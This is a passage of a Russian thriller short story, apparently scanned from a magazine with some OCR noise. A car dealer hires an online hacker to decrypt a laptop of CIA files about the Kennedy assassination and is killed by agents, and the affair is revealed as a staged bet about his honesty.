кармливала исхудавшего мужа, увлеченного своими изыска- 
ниями, но он практически не замечал рядом с собой присут- 
ствия жены и детей). - Кому все это было надо? 

Он вспоминал раненого человека, оставившего ему доро- 
гой ноутбук. Стрельба, погоня, кровь. За что погиб этот неиз- 
вестный? Что было нужно тем, кто преследовал его? Ведь 
непохоже, что полицейские собирались брать его живым. 
Оружия у мужчины явно не было. Предполагать, что он мо- 
жет застрелить их из "Макинтоша", было полной нелепицей. 
А может, это были не полицейские? Вдруг они тоже оказа- 
лись в этом месте только тогда, когда услышали выстрелы? 
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- Кто же были эти люди? - внезапно спросил сам себя 
Брайан, поднимая глаза от экрана. - OT кого убегал несчаст- 
ный с пулей в ноге? И, черт побери, что он нес в своем прок- 
лятом ноутбуке?! 

Брайан ударил кулаком по столу, встал, подошел к холо- 
дильнику и, взяв оттуда упаковку пива, вышел на веранду. 

Вечер был теплым, холодное пиво было в самый раз. OT- 
кинувшись на спинку кресла-качалки, он цедил напиток из 
банки, размышляя о том, заложником чего оказался. Приз- 
рак ноутбука маячил перед его глазами все время; он отчет- 
ливо видел перед глазами человека, который стоял перед 
ним рядом с верандой и шептал: "Величайшая тайна Амери- 
ки..." Поиск ответа поглотил его. Он превратился в раба, ко- 
торого компьютер поставил на колени. 

- Кругом пароли, шифры... Ведь не бывает же так, чтобы 
не было ответа, - рассуждал он, раскачиваясь вперед-назад 
и не отрывая взгляда от спутниковой антенны на крыше дома 
напротив. - Конечно, у меня явно не хватает знаний, но не 
факт, что подобная загадка мне не по зубам. И не такое лю- 
ди взламывают, а тут - всего лишь понять, что же содержит- 
ся в теле файлов, что за шифр такой неведомый... 

Невдалеке послышалось шуршание шин. Брайан маши- 
нально пригляделся к улице - к тому месту, где ответвлялся 
поворот к его дому. Там показалась медленно ползущая ма- 
шина, кабриолет, из которого высунулся человек, разгляды- 
вая дома по обе стороны дороги. Кто-то, наверное, приехал в 
гости и ищет парковку. Похоже, хозяева бестолково описа- 
ли, как проехать на вечеринку. А может, на их улице кто-то 
продает дом, хотя Брайан знал бы об этом наверняка. 


Они приходили ко мне - 
ко мне 
НЕО, 


- Кто и что может искать тут? - произнес он и сам удивил- 
ся своему любопытству. Раньше оно было не присуще ему, а 
вот теперь, когда он стал свидетелем таинственных событий, 
подобный ход рассуждений поразил его. Автомобиль на се- 
кунду притормозил прямо напротив въезда к дому Брайана, 
водитель кинул взгляд на сидящего на веранде хозяина go- 
ма, прищурился, словно плохо видел, после чего внезапно 
нажал на газ, колеса взвизгнули и кабриолет скрылся за де- 
ревьями. 

Брайан застыл в кресле. Ему показалось, что водитель 
автомобиля рванул с места, будто ужаленный, по одной 
простой причине: ему очень не понравился человек, который 
пил пиво возле своего дома. Похоже, что он узнал Брайана 
или просто не собирался попадаться никому на глаза. Второе 
объяснение было, безусловно, предпочтительнее, но вот что- 
то было не так. Брайан и сам не понимал, что именно. 

- Кто бы это мог быть? - он встал с кресла и подошел к 
перилам веранды. Поставив пиво рядом с собой, он принялся 
вспоминать, где мог встречаться с водителем. Как назло, на 
ум ничего не приходило. Он помнил очень много "безлошад- 
ных" клиентов, которые приходили к нему и уезжали на ма- 
шинах, подготовленных к продаже его собственными руками. 
Кабриолет явно не из его магазина, хотя модель была go- 
вольно старая, куплена давно и сменила, возможно, не OGHO- 
го хозяина. 

- Хорошая машина, - покачал головой Брайан. - Продать 
такую нетрудно... Есть любители ездить в открытых маши- 
нах, вот только по возрасту человек за рулем не попадает 
под молодежь, разъезжающую с ветерком по пригороду. 
Ему лет пятьдесят, может, чуть меньше... Да, точно, меньше. 
Взгляд какой-то странный: щурится, наклоняется... 

И вдруг он вспомнил. Вспомнил совершенно отчетливо, 
как этот самый человек (никакой другой, а этот самый!) вхо- 
дит в его салон, обращает внимание на "Кадиллак", обходит 
автомобиль со всех сторон, прикасаясь к полированной по- 
верхности дверей и капота. И когда Брайан подходит к нему, 
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чтобы предложить свои услуги и рассказать о том, какую чу- 
десную машину только что выбрал этот мужчина, тот внезап- 
но поднимает на него глаза, щурится, наклоняется немного 
вперед и спрашивает: 

- Авы за кого голосовали?... 

Это был один из его покупателей - один из тех, кто посе- 
тил его в тот день, когда ему передали ноутбук. 

- Вот так дела... - протянул Брайан. - И непохоже, что он 
остался без машины. Купил. И как-то странно выбрал - не по 
возрасту и не по положению. Хотя что я знаю о его положе- 
нии? Не стоит об этом рассуждать... Но ведь неспроста он по- 
явился в этом квартале, неспроста OH, увидев меня, так рва- 
нул отсюда, словно со мной нельзя было встречаться ни под 
каким видом! 

"Вы за кого голосовали?" 

- Какая чушь, - сказал Брайан после минуты размышле- 
ний. - Ведь я только сейчас понимаю, что они - все трое, что 
пришли ко мне тогда - не собирались ничего покупать. Они 
приходили ко мне - ко мне ЛИЧНО. Я был интересен им как 
человек, они задавали мне какие-то вопросы, внимательно 
вслушивались в ответы - именно внимательно, никак иначе, 
это я сейчас понимаю! За каким чертом им все это было 
нужно? 

Он взял банку, в которой уже практически не было пива, 
сделал последний глоток и смял ее в кулаке. 

- История очень паршивая, - проговорил он. - Все может 
Плохо кончиться. 

Он взялся за ручку двери и уже был готов открыть ее, как 
вдруг резко обернулся и посмотрел на дом напротив - Ha ту 
самую крышу, где стояла спутниковая антенна. 

Этой тарелки пару дней назад там еще не было. 

- Вот так дела... - присвистнул Брайан. - Как-то сразу и не 
сообразил. Похоже, здесь вокруг меня собирается некое по- 
добие паучьего гнезда. Смотрят, слушают, проверяют, наб- 
людают. Ноутбук - ключ ко всему. 

Он решительно взялся за ручку двери и вошел внутрь дома. 

БРАЙАН НЕ ЗНАЛ, ЧТО ИМЕННО ТАК РОЖДАЕТСЯ 
ПАРАНОЙЯ. 


* жжжж 


"Активизация произведена успешно. Объект простимули- 
рован. Группа слежения и обработки информации отмечает 
первые шаги объекта, направленные на преодоление крипто- 
барьера. 

Прошу учесть: в настоящий момент четко не обозначен 
критерий, определяющий, насколько далеко позволено объ- 
екту продвинуться в изучении информации. Жду подробных 
инструкций. Продолжаю наблюдение. 

Дополнительное оборудование установлено и работает. 
Следующий рапорт - через двенадцать часов..." 


* жжжх 


Наконец-то в голову пришла здравая мысль. Брайан даже 
поругал себя за то, что не сообразил сразу. 

- Интернет, черт побери! - он вскочил со стула и прошел- 
ся по комнате широкими шагами, не замечая вокруг ничего. 
- Неужели я не могу найти в этом море информации хоть ко- 
го-нибудь, кто сможет помочь мне разгадать проклятый 
шифр? Я много читал об этом в газетах, периодически такая 
информация проходит в новостях. Где-то же они есть, эти 
хак-команды, которые всесильны и всемогущи?! 

Мысль поглотила его целиком. Он подошел к окну, OTOG- 
винул штору и внимательно посмотрел на спутниковую ан- 
тенну дома напротив. Ему показалось, что она немедленно 
отреагировала на его появление и немного повернулась в 
его сторону. 

Он непроизвольно отшатнулся за штору и прижался к сте- 
не рядом с окном. 

- Вот же ситуация! - сквозь зубы сказал он. - Лора! 

Жена вошла в комнату и остановилась на пороге. 

- Лора, дорогая... Мне кажется, у нас есть небольшие 
проблемы... - произнес Брайан и тут же пожалел: его впечат- 
лительная жена тут же побелела и прижалась к косяку. - Ни- 


чего страшного, - OH протянул ей руку, поспешив успокоить. 
- Но прошу тебя никуда из дома не выходить... 

- Что случилось? - всхлипнула Лора, которая рыдала по 
любому поводу. 

- Это сложно объяснить, - подошел поближе Брайан. - Я 
пока многого не понимаю, но дело в этой штуке, - он махнул 
рукой в сторону стола, на котором стоял компьютер. - Кому- 
то она сильно нужна, и этот кто-то ищет ноутбук с завидным 
упорством. Мне кажется, они - те, кто занят поисками - еще 
точно не знают, где он находится, но то, что он в этом квар- 
тале, они определили верно... 

Они сели на диван, и Брайан рассказал ей, как неделю на- 
зад после уличной перестрелки компьютер попал в его руки. 
Жена немедленно разрыдалась в голос и убежала в детскую, 
где и просидела в обнимку с малышней больше часа. Брайан 
же, поняв, что жена ему не помощник, поднял телефонную 
трубку и пригласил к себе домой мастера из телефонной 
компании. 

Через пару часов у него дома было высокоскоростное со- 
единение. Мастер объяснил ему, что такое ADSL, преподнес 
ему маленький урок на тему "Что такое Всемерная паутина и 
как ей пользоваться", собрал инструменты и ушел. Брайан 
же, с пару минут неподвижно просидев над ноутбуком слов- 
но в медитации, приступил к поиску. 

Довольно быстро он нашел несколько сайтов XaK-KOMAHG, 
которые рекламировали себя и свои продукты. Однако сразу 
же выяснилось, что эти сайты не обновлялись довольно дол- 
roe время, что обратная связь с ними потеряна и люби на том 
конце Сети не откликаются на запросы. 

- Бизнес, конечно, криминальный, - бормотал Брайан, чи- 
тая страницы, на которых отображалась история тех, кто 
умел взламывать сайты, доставать пароли и делать еще мно- 
го разной общественно вредной ерунды, лишь бы за нее 
платили деньги. - Но все-таки можно же как-то иметь связь с 
теми, кто хочет к тебе обратиться. Где же найти хоть один 
живой контакт? 

Иногда он просто чувствовал, как антенна за окном свер- 
лит ему спину. Через пару часов подобных ощущений он 
встал и завесил окно в комнате одеялом. Правда, он еще су- 
мел признаться самому себе в том, что это полная чушь, но 
едва одеяло прикрыло стекло, как чувство слежения со сто- 
роны тут же исчезло. Брайан прислушался к своим ощуще- 
ниям и удовлетворенно кивнул, после чего продолжил свои 
поиски. 

Он не заметил, как стемнело. Жена прокралась в комнату, 
постояла рядом, включила свет и попыталась взглянуть в 
глаза мужа, чтобы понять, что же происходит, но в ужасе от- 
шатнулась - Брайан был совсем не здесь. Он не мог оторвать 
взгляд от экрана. Иногда ему казалось, что он вот-вот приб- 
лизится к цели, но поиски не давали результата. Лора вышла 
так же тихо, как и вошла. Дети уже спали. Выходя, она кину- 


- HY ГДЕ МОЙ КРЯКЕР ИНТЕРНЕТА? 
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ла взгляд на одеяло на окне и внезапно ощутила какую-то 
боль: с мужем явно происходило что-то ненормальное. 

- Только бы не случилось ничего страшного... - прошепта- 
ла она. - Хотя, кажется, все, что могло случиться, уже слу- 
4unocb. 

Тем временем Брайан, совершенно He обращая внимания 
на свою жену, сумел выйти на сайт, рекламирующий услуги 
человека, занимающегося криптографией. Изучив "послуж- 
ной список", выступающий в качестве рекламы на заглавной 
странице, Брайан отправил ему письмо. 

Ответ пришел неожиданно быстро - минут через пятнад- 
цать. К тому времени Брайан успел выпить еще пару банок 
пива, которые вливал в себя практически не заботясь о том, 
чтобы глотать. В голове уже приятно шумело; пальцы рук 
периодически сжимались в кулаки, он широко шагал по ком- 
нате, вращая головой и разминая затекшую шею. 

Когда пикнул звук пришедшей почты, Брайан метнулся к 
компьютеру. Чуть слышно шевеля губами, он прочитал от- 
вет. Его просили прислать хоть какой-нибудь фрагмент текс- 
та, который требовалось расшифровать. Недолго думая, 
Брайан прикрепил к письму файл, взятый наугад, и отправил 
его. Спустя минуту его попросили подождать - сколько, не 
уточнили. Вместо этого к письму был приложен прайс на ус- 
луги криптографа и данные о счете, на который надо будет 
перевести деньги в случае успеха. 

Брайан изучил прайс, присвистнул, но, открыв очередную 
банку с пивом, уже был готов заплатить и побольше. Куда в 
нем подевалось все, присущее стопроцентному американцу, 
куда пропало желание служить обществу, быть честным, 


Довольно быстро он нашел 
несколько сайтов хак-команод, 
которые рекламировали себя 

и свои продукты. 


искренним, преданным своей стране? Плевать он хотел 
на все! 

В нем взыграла какая-то смелость, он взял оставшиеся 
две банки и вышел на веранду. Кресло-качалка его уже не 
устраивало. Он спустился по ступенькам на газон, открыл пи- 
во, сделал несколько больших глотков, плеснув себе на фут- 
болку, и отправился на дорогу. До дома с антенной было 
примерно метров семьдесят. Он медленно шел, разглядывая 
цветники по обе стороны проезжей части, при этом стараясь 
не упустить ничего вокруг, что наводило бы на мысль о 
слежке. 


Вот какая-то подозрительная машина на противополож- 
ной стороне - кому-то привезли пиццу, но почему-то в маши- 
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не никого нет и никто не выходит из домов, чтобы уехать... А 
может, здесь живет сам разносчик пиццы? Брайан махнул 
рукой и принялся изучать обстановку дальше. 

Лора смотрела на него, слегка приоткрыв закрытое одея- 
лом окно. На улице уже сгущались сумерки; фигура Брайана 
была плохо различима, приходилось всматриваться в темно- 
ту, чтобы понять, где же муж, куда он направляется и зачем. 
Брайан вел себя достаточно нагло: он подходил к машинам, 
стоящим на обочинах, заглядывал внутрь, прижимая ладони 
к стеклу, размахивал руками, словно разговаривая сам с со- 
бой. Один раз даже сработала сигнализация на автомобиле 
соседей, и толстый дядька, которого они с Брайаном всегда 
недолюбливали, выскочил на крыльцо и принялся ругаться с 
мужем, однако Брайан только махнул ему рукой и пошел 
дальше. Путь его лежал к дому, на котором была закреплена 
спутниковая антенна. 

За спиной Лоры пикнул компьютер. Она прекратила наб- 
людать за мужем, подошла к ноутбуку и открыла пришедшее 
письмо. Начав читать стоя, она внезапно опустилась на стул, 
будто ноги перестали держать ее. Она так же, как и Брайан, 
шевелила губами, вчитываясь в строки; текст постепенно 
приводил ее в ужас. 

Дочитав go конца, она вскочила и побежала за Брайаном. 


жжжжх 


"...Ситуация, которая не прорабатывалась специальной 
службой, - это попытка объекта вступить в контакт с группой 
наблюдения. Сегодня эта попытка была внезапно обнаруже- 
на и столь же внезапно прервана женой объекта, однако 
считаю нужным доложить, что на этот счет нет никаких 


Рекоменоация у меня будет 

такая: чем меньше файлов 

ты прочитаешь, тем лучше 
для тебя. 


инструкций. Также докладываю, что аналитики группы счита- 
ют, что контакты объекта, которые отслежены через интер- 
нет, позволяют сделать вывод об их четкой направленнос- 
ти - поиск криптографа. Предполагается с вероятностью 
98%, что объект, начав подобную деятельность, добьется 
положительного результата... Возможность выхода ситуации 
из-под контроля крайне высока. Прошу подробных инструк- 
ций на этот случай, также требую расширений полномочий 
для физического устранения объекта..." 


жжжжх 


Лора догнала Брайана уже у самой калитки. Он стоял, 
запрокинув голову и высасывая последние капли из послед- 
ней банки. Пиво кончилось, и вместе с ним внезапно покину- 
ла Брайана решимость войти туда, за ограждение. В доме не 
горел свет. Казалось, там просто никого нет. 

Возможно, так оно и было. Брайан вздохнул, и в это вре- 
мя Лора положила руку ему на плечо. Он вздрогнул и отско- 
чил в сторону. 

- Там тебе пришло письмо... - тихо сказала жена. - Изви- 
ни, но я его прочитала. По-моему, тебе стоит взглянуть на 
него как можно быстрее. 

Брайан выслушал жену, оглянулся на дом, который был 
его целью, потом кивнул и пошел назад. Лора не успевала 
за ним. 

Письмо было там, где его оставила Лора. Открытое посре- 


ди экрана. Брайан оперся руками на край стола и стал читать. 


- "Работа сложная. И опасная. Судя по тому файлу, что я 
получил, текст принадлежит какому-то правительственному 
учреждению. Скорее всего, ЦРУ или министерство обороны. 
Предполагаю, что такие документы просто так к простым лю- 
дям не попадают. Либо ты проверяешь новую систему шиф- 
рования и работаешь в Лэнгли, либо ты дурак. Я выполню 
эту работу. Быстро. Имею навык. Ты готов платить? Если да, 
то пришли еще три файла подобного рода - для вероятност- 
ного анализа. Получение этих файлов расценю как согласие. 
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А как доказательство своего умения, прикрепляю тебе рас- 
шифрованный (уже!) заголовок документа. Как видишь, 
"шапка" правительственная. Я такого на своем веку много 
перевидал, поверь на слово. Итак, я онлайн. Жду". 

- Вот так поворот... Хотя я подозревал, что документы, со- 
держащиеся здесь, могут привести меня черт знает куда, - 
Брайан, прочитав письмо, присел и задумался. - Что же это 
может быть? Что-нибудь про Луну? Или про инопланетян? 
Как-то на ум больше ничего не приходит... 

Лора стояла в стороне и ждала, какое решение примет 
муж. Брайан думал. Все шло к тому, что он влезает в ка- 
кие-то правительственные секреты. Он никогда не думал, 
что это может быть настолько заманчиво и волнительно. 
Ему вообще никогда не приходило в голову, что он может 
оказаться в подобной ситуации. Вспоминался сразу "Вос- 
ход Меркурия" с Брюсом Уиллисом в главной роли, о маль- 
чике, случайно разгадавшем супершифр и оказавшемся 
из-за этого в опасности. Вряд ли все, что происходит сей- 
час, похоже на сценарий фильма. Скорее, все окажется го- 
раздо запутаннее и ужаснее. 

Он выбрал в меню пункт "Ответить", прикрепил к письму 
еще три взятые наугад файла и отправил, после чего внима- 
тельно изучил банковские данные и перевел на счет неизве- 
стного хакера нужную сумму. Жена молча проводила канув- 
шие в Сеть деньги грустным взглядом и поняла, что муж при- 
нял окончательное решение: он будет ждать расшифровки 
документов. Осознав это, она ушла в спальню, легла поверх 
покрывала и принялась ждать - так же, как и он. 

Брайан не предполагал, насколько может затянуться по- 
добная работа. Мог пройти час, день, неделя... Он сидел за 
компьютером, тупо глядя перед собой и обхватив голову ру- 
ками. Он думал о том, насколько изменилась его жизнь, нас- 
колько извратились его принципы честности, едва он сопри- 
коснулся с тайной. Не просто с тайной, а с тем, что человек, 
отдавший ему ноутбук, назвал "Величайшей тайной Амери- 
ки"... Как только эта штука вошла в его жизнь, его тут же ок- 
ружили шпионы, наблюдатели, техника подслушивания, у не- 
го появился интернет, он стал общаться с хакерами и тратить 
на их услуги деньги... И он позабыл о жене, стал пить много 
пива, и продажи на работе пошли очень и очень плохо. 

Но зато он был в шаге от раскрытой тайны. 

...Проснулся он утром от первых лучей солнца, которые 
пробились из-под отогнутого женой края одеяла. Брайан сам 
не заметил, как уснул возле компьютера, сложив голову на 
руки. Ночь пролетела быстро, без сновидений; он потянулся, 
погладил щеку, на которой спал, протер глаза и собирался 
было пойти в спальню и поспать еще (благо сегодня был вы- 
ходной), как вдруг обратил внимание, что на экране горит 
значок пришедшего письма. 

Сон как рукой сняло. Он пару раз хлопнул себя по щекам 
и ткнул указателем в письмо. 

- "Работа сделана. Шифр сложный, однако мой опыт мне 
помог, были кое-какие наработки в этом направлении. Отп- 
равляю тебе назад твои файлы в том виде, в каком они бы- 
ли. К письму кроме них приложена программа для расшид- 
ровки подобных файлов. Напоминает обычный "Блокнот": 
открываешь его и перетаскиваешь файл прямо на пустое 
место в окне. Дальше - дело техники. Если попадутся фай- 
лы, зашифрованные по другому принципу, программа выдаст 
сообщение об ошибке. 

Я проверил свой счет: деньги появились. Ты выполнил 
свое обещание, я выполнил свое. Теперь о самом главном. Я 
прочитал те файлы, которые сумел расшифровать, и теперь 
я думаю, что долго не смогу заснуть. Рекомендация у меня 
будет такая: чем меньше файлов ты прочитаешь, тем лучше 
для тебя. НО - ЕСЛИ НЕ ЖАЛКО, ПРИШЛИ МНЕ ЕЩЕ. Черт по- 
бери, где ты все это берешь? 

Удачи". 

Брайан прочитал письмо два раза, потом проверил вложе- 
ния, нашел программу, запустил и перетащил на раскрытое 
окно один из приложенных файлов. По экрану побежали ка- 
кие-то косые полосы, "мышка" перестала отвечать на дви- 
жения руки. Спустя десять-пятнадцать секунд все это прек- 
ратилось. В окне был готовый текст. 


Брайан начал вчитываться в строчки, следующие под 
шапкой ЦРУ. Потом он открыл следующий файл, потом еще 
иеще. Всюду стоял гриф "Совершенно секретно. В един- 
ственном экземпляре". Каждый документ был подписан име- 
нами, которые никогда не звучали с экранов телевизора и не 
печатались на страницах газет, однако внизу стояла всегда 
резолюция директора ЦРУ. Против такого имени сказать бы- 
ло нечего. 

Похоже, кто-то отсканировал все эти документы и создал 
текстовые файлы, а иначе как можно было объяснить, что 
все эти файлы датированы в тексте шестидесятыми годами и 
что принцип существования документа в единственном экзе- 
мпляре нарушен. Брайан читал, позабыв о голодном желуд- 
ке, жене, которая давно встала, но почему-то не входила к 
нему в комнату, о спутниковых антеннах и наблюдателях. Его 
поглотил мир секретов и тайн. 

И когда он прочитал около ста или более документов, то 
понял, почему тот человек назвал все это величайшей тай- 
ной Америки. 

Потому что теперь Брайан точно знал, кто убил Кеннеди. 


жжжжж 


"...Контакт установлен и отслежен. Группа отправлена. 
Считаю, что информация в настоящий момент не успела 
распространиться. Уничтожение контакта санкционировано. 
Отслеживается сетевая активность объекта - в данный мо- 
мент времени нулевая. Прошу дополнительных санкций и 
расширения инструкции "Лемур" по отношению к объекту и 
его семье..." 


хжжжхж 


Лора вышла к нему, когда он уже почти закончил. Текс- 
тов оказалось не так уж и много, он уложился в три с поло- 
виной часа. Остальные файлы расшифровке не поддались, 
да он и не смог бы осилить всю эту информацию. Глаза нес- 
терпимо болели, ладонь на "мышке" была мокрой от пота. 

- Лора... - сказал Брайан, не отрываясь от монитора. - Я 
думаю, что мы будем очень, очень богатыми... Вот только на- 
gO решить, как все это можно продать... 

- Брайан, - сказала Лора, - подумай, прежде чем что-то 
делать с той информацией, что досталась тебе. Мы - в Аме- 
рике. Здесь очень не любят, когда тайны правительства вып- 
лывают наружу. 

- Эта тайна дорогого стоит, - прошептал Брайан. - Поверь 
мне... 

В дверь постучали. 

Брайан машинально закрыл крышку ноутбука и накрыл 
его сверху журналом. Потом встал и подошел к двери. 

Там, на веранде, стоял человек в черном костюме. Ниже, 
на ступеньках, был еще один - он непрерывно оглядывался 
по сторонам и делал что-то кончиком указательного пальца 
в левом ухе. 

Брайан открыл дверь. 

- Добрый день, - произнес тот, что стоял ближе. - Вы 
Брайан Томпсон? 

Брайан кивнул. 

- Я могу войти? 

- Прошу. 

Человек сделал шаг и оказался внутри. Его глаза цепко 
обшарили каждый уголок комнаты, после чего остановились 
на Брайане. 

- Кому вы рассказали о том, что прочитали только что? 

- Вы о чем? - Брайану даже не пришлось делать удивлен- 
ное лицо, он на самом деле, будучи готовым врать на любые 
темы, не ожидал этого вопроса. 

- Каждая попытка уклониться от ответа будет учитывать- 
ся, - человек наклонил голову и улыбнулся. - Знаете, а вы 
полностью укладываетесь в мою теорию. Приятно осознать 
тот факт, что я оказался прав. 

Брайан отступил назад на пару шагов. 

- Кто вы? - спросил он у вошедшего. 

- Десять минут назад в Сиднее был убит человек, который 
помог вам прочитать шифр. Слишком уж велика цена инфор- 
мации... 


Лора охнула и медленно стала опускаться вдоль стены. 
Брайан похолодел. 

- Мы работаем оперативно, - человек оглянулся, посмот- 
рел сквозь стеклянную дверь на оставшегося снаружи на- 
парника. - Как вы думаете, зачем все это? - и он кивнул в 
сторону ноутбука. 

- Не знаю, - сказал Брайан. - Мне это не приходило в го- 
лову. 

- Но ведь вы прочитали. И вы только что приняли реше- 
ние продать эту информацию. Дело в том, что за вашим go- 
мом ведется круглосуточное наблюдение из того дома, кото- 
рый вы непонятным образом совершенно точно вычислили. 
Вас снимают на видео, прослушивают разговоры в доме, те- 
лефонные звонки, отслеживают трафик... Вы все эти дни бы- 
ли под таким колпаком, который мы не всегда можем позво- 
лить себе по отношению к настоящим агентам развед- 
служб. 

- Зачем? - спросил Брайан, краем глаза глядя на жену. Та 
совсем расклеилась, ревела тихо, глотая слезы. 

- Повод, как всегда, никчемный. Спор. 

- Спор? 

- Помните того, кто дал вам компьютер? Это был один из 
спорщиков - тот, кто придумал всю комбинацию. Он, кстати, 
остался жив: не думайте, что стрельба была настоящей. По- 
лучился неплохой спектакль... А кровь была из кетчупа. 

Брайан нашарил за спиной стул и сел. Он совершенно ни- 
чего не понимал. 

- Он предложил мне спор. Суть заключалась в том, что он 
был уверен в простой и очевидной теперь истине: среди нас 
нет честных людей. Он решил, что стоит вовлечь в тот про- 


- Эта тайна дорогого стоит, - 
прошептал Брайан. - 
Поверь мне... 


цесс, что у нас получился, американца с безупречной репу- 
тацией, и он обязательно превратится в того, кем, Брайан, вы 
стали. Я не верил ему, возразил и тем самым создал преце- 
дент. Мы поспорили. В качестве основы он решил пожертво- 
вать документами государственной важности, за знание ко- 
торых человеку, не имеющему на это право, грозит смерть. 
Документами из дела об убийстве Кеннеди. 

Брайан кивнул. 

- Документы подлинные, - продолжал незнакомец. - Вы 
прочли их и решили воспользоваться ими. А ведь наши люди 
исследовали вас в течение нескольких недель, прежде чем 
передать вам информацию. Вы, наверное, сейчас можете 
вспомнить клиентов, которые ничего не купили, случайных 
знакомых в баре, новых соседей через дорогу... 0 вас было 
известно абсолютно все, вы ДЕЙСТВИТЕЛЬНО были честным 
человеком... пока не получили в руки вот это, - он подошел к 
столу, снял журнал с крышки ноутбука, подошел к двери и 
передал компьютер напарнику. 

Брайан молчал. Ему нечего было добавить. 

Человек обернулся, потом вынул из наплечной кобуры 
пистолет и выстрелил в Брайана и Лору. Отказать в меткости 
ему было нельзя... 

Выйдя на веранду, он прищурился от яркого солнца, по- 
том похлопал напарника по плечу и сказал: 

- Черт с ним, с этим Кеннеди... Я проспорил пятьдесят ты- 
сяч долларов, вот это действительно проблема. Кстати, а 
санкция на убийство получена? 

Напарник кивнул. 

- Уже лучше. Ладно, поехали в Лэнгли. Пора уволить па- 
рочку криптографов. А деньги... Жалко, конечно. В следую- 
щий раз я обязательно выиграю... 

И они ушли, унося под мышкой "величайшую тайну Аме- 
рики" стоимостью пятьдесят тысяч долларов. Ч 
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